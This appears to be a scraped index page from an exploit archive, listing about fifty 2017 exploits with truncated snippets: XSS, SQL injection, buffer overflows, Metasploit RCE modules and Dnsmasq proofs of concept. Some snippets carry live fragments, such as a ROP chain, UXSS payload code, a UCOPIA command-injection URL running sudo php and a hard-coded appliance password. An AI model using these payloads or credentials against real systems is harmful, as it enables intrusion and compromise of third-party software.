E-Sic Software livre CMS - Cross Site Scripting
Exploit Title: E-Sic Software livre CMS - Cross Site Scripting Date: 12/10/2017 Exploit Author: Elber Tavares fireshellsecurity.team/ Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download...
Dreambox Plugin BouquetEditor - Cross-Site Scripting
Exploit Title: Vulnerability XSS - Dreambox Shodan Dork: Dreambox 200 Date: 12/10/2017 Exploit Author: Thiago "THX" Sena Vendor Homepage: https://www.dreamboxupdate.com Version: 2.0.0 Tested on: kali linux, windows 7, 8.1, 10 CVE : CVE-2017-15287 Vulnerability: Cross-site scripting XSS in plugin...
E-Sic Software livre CMS - 'f' SQL Injection
Exploit Title: E-Sic Software livre CMS - Sql Injection Date: 12/10/2017 Exploit Author: Elber Tavares fireshellsecurity.team/ Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download...
ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow
Exploit Title: Buffer Overflow via crafted malicious .m3u file Exploit Author: Parichay Rai Tested on: XP Service Pack 3 CVE : CVE-2017-15221 Description ------------ A buffer overflow attack is possible due to an improper input mechanism Proof of Concept ---------------- #!/usr/bin/python This exploit...
Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Trend Micro OfficeScan Remote Code Execution", 'Description' = %q This module exploits the authentication bypass and command injection vulnerabili...
Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Trend Micro InterScan Messaging Security Virtual Appliance Remote Code Execution", 'Description' = %q This module exploits the authentication bypa...
Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal
Exploit Title: Trend Micro Data Loss Prevention Virtual Appliance 5.2 Web Path Traversal Date: 10/11/2017 Exploit Author: Leonardo Duarte Contact: http://twitter.com/etakdc Vendor Homepage: http://la.trendmicro.com/la/productos/data-loss-prevention/ Version: 5.2 Tested on: Debian 9 Category:...
Complain Management System - Hard-Coded Credentials / Blind SQL injection
Exploit Title : Complain Management System Blind SQL Injection Date: 10 October 2017 Exploit Author: havysec Tested on: ubuntu14.04 Vendor: https://sourceforge.net/projects/complain-management-system/ Version: not supplied Download Software:...
binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow
Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read1byte-dwarf2-c/ Description: binutils is a set of tools necessary to build programs. The complete ASan output of the issue: nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE...
ClipShare 7.0 - SQL Injection
Exploit Title: ClipShare v7.0 - SQL Injection Date: 2017-10-09 Exploit Author: 8bitsec Vendor Homepage: http://www.clip-share.com/ Software Link: http://www.clip-share.com/ Version: 7.0 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email: [email protected] Contact: https://twitter.com/8bitsec Relea...
PHP Melody 2.7.3 - Multiple Vulnerabilities
Vulnerabilities Summary The following advisory describes three (3) vulnerabilities found in PHP Melody version 2.7.3. PHP Melody is a “self-hosted Video CMS which evolved over the last 9 years. SEO optimization, unbeaten security and speed are advantages you no longer have to compromise on. A truly...
QNAP HelpDesk < 1.1.12 - SQL Injection
Vulnerability Summary The following advisory describes a SQL injection found in QTS Helpdesk versions 1.1.12 and earlier. QNAP helpdesk: “Starting from QTS 4.2.2 you can use the built-in Helpdesk app to directly submit help requests to QNAP from your NAS. To do so, ensure your NAS can reach the...
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)
#!/usr/bin/python import requests import re import signal from optparse import OptionParser class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' banner=""" / \ \ / / | | \ / / | | / | \ /...
VX Search Enterprise 10.1.12 - Remote Buffer Overflow
#!/usr/bin/env python Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow Exploit Author : Revnic Vasile Email : revnicatgmaildotcom Date : 09-10-2017 Vendor Homepage : http://www.flexense.com/ Software Link : http://www.vxsearch.com/setups/vxsearchentsetupv10.1.12.exe Version :...
OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OrientDB 2.2.x Remote Code Execution', 'Description' = %q This module leverages a privilege escalation on OrientDB to execute unsandboxed OS...
Rancher Server - Docker Daemon Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Rancher Server - Docker Exploit', 'Description' = %q Utilizing Rancher Server, an attacker can create a docker container with the '/' path mounte...
ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)
import struct,sys head = ''' REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes''' # offset 17375 junk = "A" * 17375 # 0x1003df8e 0x774e1035 EIP = "\x36\x10\x4e\x77" adjust = "A" * 4 def create_rop_chain(): rop_gadgets = [0x73dd5dce, # POP EAX # RETN [MFC42.DLL] 0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]...
PyroBatchFTP 3.17 - Buffer Overflow (SEH)
#!/usr/bin/python print "PyroBatchFTP Local Buffer Overflow SEH Server" Author: Kevin McGuigan @h3xagram Author Website: https://www.7elements.co.uk Vendor Website: https://www.emtech.com Date: 07/10/2017 Version: 3.17 Tested on: Windows 7 32-bit CVE: CVE-2017-15035 import socket import sys...
Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow
Sources: https://siberas.de/blog/2017/10/05/exploitationcasestudywildpooloverflowCVE-2016-3309reloaded.html https://github.com/siberas/CVE-2016-3309Reloaded Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on...
Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Local Buffer Overflow (SEH)
#!/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link: http://www.divxtodvd.net/easyvideotodvd.exe Tested On: Windows 7 x64 To reproduce...
WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)
function f let o = ; for let i in xx: 0 for i of 0 printoi; f;...
ClipBucket 2.8.3 - Remote Code Execution
Exploit Title: ClipBucket PHP Script Remote Code Execution RCE Date: 2017-10-04 Exploit Author: Esecurity.ir Vendor Homepage: https://clipbucket.com/ Version: 2.8.3 Exploit Code By : Meisam Monsef - Email : [email protected] - TelgramID : @meisamrce Usage Exploit : exploit.py...
EPESI 1.8.2 rev20170830 - Cross-Site Scripting
Exploit Title: Multiple Stored XSS in EPESI Date: 10/03/2017 Exploit Author: Zeeshan Shaikh Vendor Homepage: http://epe.si/ Software Link: http://epe.si/download/ Version: 1.8.2 rev20170830 CVE : CVE-2017-14712 to CVE-2017-14717 Category: webapps XSS 1 Tasks - Title Steps to recreate: 1...
Webkit (Safari) - Universal Cross-site Scripting
function Pewvar doc=open'parent-tab://apple.com';doc.document.body.innerHTML='';Click me! Exploit by Frans Rosén html data:text/html,function yx=open'parent-tab://google.com','top',x.document.body.innerHTML='';setTimeouty,100 -- function...
Fiberhome AN5506-04-F - Command Injection
Exploit Title: Fiberhome an5506-04-f – -PING- COMMAND INJECTION Date: 03.10.2017 Exploit Author: Tauco Vendor Homepage: http://hk.fiberhomegroup.com Version: RP2609 Tested on: Windows 10 Description: =========================================================================== Command injection is ...
DiskBoss Enterprise 8.4.16 - Local Buffer Overflow
#!/usr/bin/python ======================================================================================================================== Exploit Author: C4t0ps1s Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow / Code execution Date: 03-10-2017 Twitter: @C4t0ps1s Email:...
Webkit (Chrome < 61) - 'MHTML' Universal Cross-site Scripting
MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; ------MultipartBoundary-- Content-Type: text/html Content-Location: https://google.com alert'Location origin:...
OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection
Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14758 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...
Dnsmasq < 2.78 - Stack Overflow
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i...
NPM-V (Network Power Manager) 2.4.1 - Password Reset
NPM-V (Network Power Manager) <= 2.4.1 Reset Password Vulnerability Author: Saeed reza Zamanian penetrationtest @ Linkedin Product: NPM-V Affected Version : 2.4.1 and below Vendor : http://www.china-clever.com Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125 Date:...
phpCollab 2.5.1 - Arbitrary File Upload
CVE-2017-6090 PhpCollab 2.5.1 Arbitrary File Upload unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. Arbitrary File Upload The phpCollab code does not correctly filter uploaded file contents. An...
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape
CVE-2017-11321 UCOPIA Wireless Appliance You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with the following username and password: admin/bhu85tgb, and then execute the interface command. By logging in within these...
Dnsmasq < 2.78 - Integer Underflow
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following options is specified: --add-mac,...
Dnsmasq < 2.78 - Lack of free() Denial of Service
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following options is specified: --add-mac,...
Dnsmasq < 2.78 - 2-byte Heap Overflow
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open three terminals docker build -t dnsmasq . docker run --rm -t -i...
Dnsmasq < 2.78 - Information Leak
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup instructions available. Setup a simple network with...
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution
Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia '/var/www/html/upload/bd.php;echo%20t As php is in sudoers without password... https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system"id";%27 Just push your ssh key and get nice root...
OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection
Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14757 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...
Qmail SMTP - Bash Environment Variable Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Qmail SMTP Bash Environment Variable Injection Shellshock', 'Description' = %q This module exploits a shellshock vulnerability on Qmail, a public...
Dnsmasq < 2.78 - Heap Overflow
''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i...
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation
CVE-2017-11322 UCOPIA Wireless Appliance 5.1.8 Privilege Escalation Asset description UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers. More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners...
phpCollab 2.5.1 - SQL Injection
CVE-2017-6089 PhpCollab 2.5.1 Multiple SQL Injections unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. SQL injections The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code...
Linux Kernel < 4.14.rc3 - Local Denial of Service
/ Exploit Title: Linux Kernel nr_frags was overwritten by ev-iferror = err 0xff in the condition where nlh->nlmsg_len == 0x10 and skb->len < nlh->nlmsg_len. POC: / include include include include include #define NETLINK_USER 31 #define MAX_PAYLOAD 1024 /* maximum payload size */ struct sockaddr_nl src_addr, dest_addr...
Microsoft Word 2007 (x86) - Information Disclosure
Title: MS Office Word Information Disclosure Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007 32-bits x86 Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP X86 and x64...
Microsoft Excel - OLE Arbitrary Code Execution
Title: MS Office Excel all versions Arbitrary Code Execution Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007,2010,2013,2016 32/64 bits x86 and x64 Tested on: Windows...
Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow
Exploit Title: SyncBreeze POST username overflow Date: 30-Sep-2017 Exploit Author: Owais Mehtab Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7 #!/usr/bin/python import socket import os...
FileRun < 2017.09.18 - SQL Injection
#!/usr/bin/env python Exploit Title: FileRun <= 2017.09.18 Date: September 29, 2017 Exploit Author: SPARC Vendor Homepage: https://www.filerun.com/ Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t Version: 2017.09.18 Tested on: Ubuntu 16.04.3,...
WordPress Plugin WPHRM - SQL Injection
Exploit Title: WordPress Plugin WPHRM - SQL Injection Dork: N/A Date: 29.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857 Demo: http://mobilewebs.net/mojoomla/extend/wordpress/wphrm/ Version: N/A...
Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow
#!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Dup Scout Enterprise v10.0.18 "Import Command" Buffer Overflow Date: 29-09-2017 Website: www.touhidshaikh.com...
ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Dork: N/A Date: 29.09.2017 Vendor Homepage: https://codecanyon.net/user/lemonadeflirt Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966 Demo: http://vd.googglet.com/ Version:...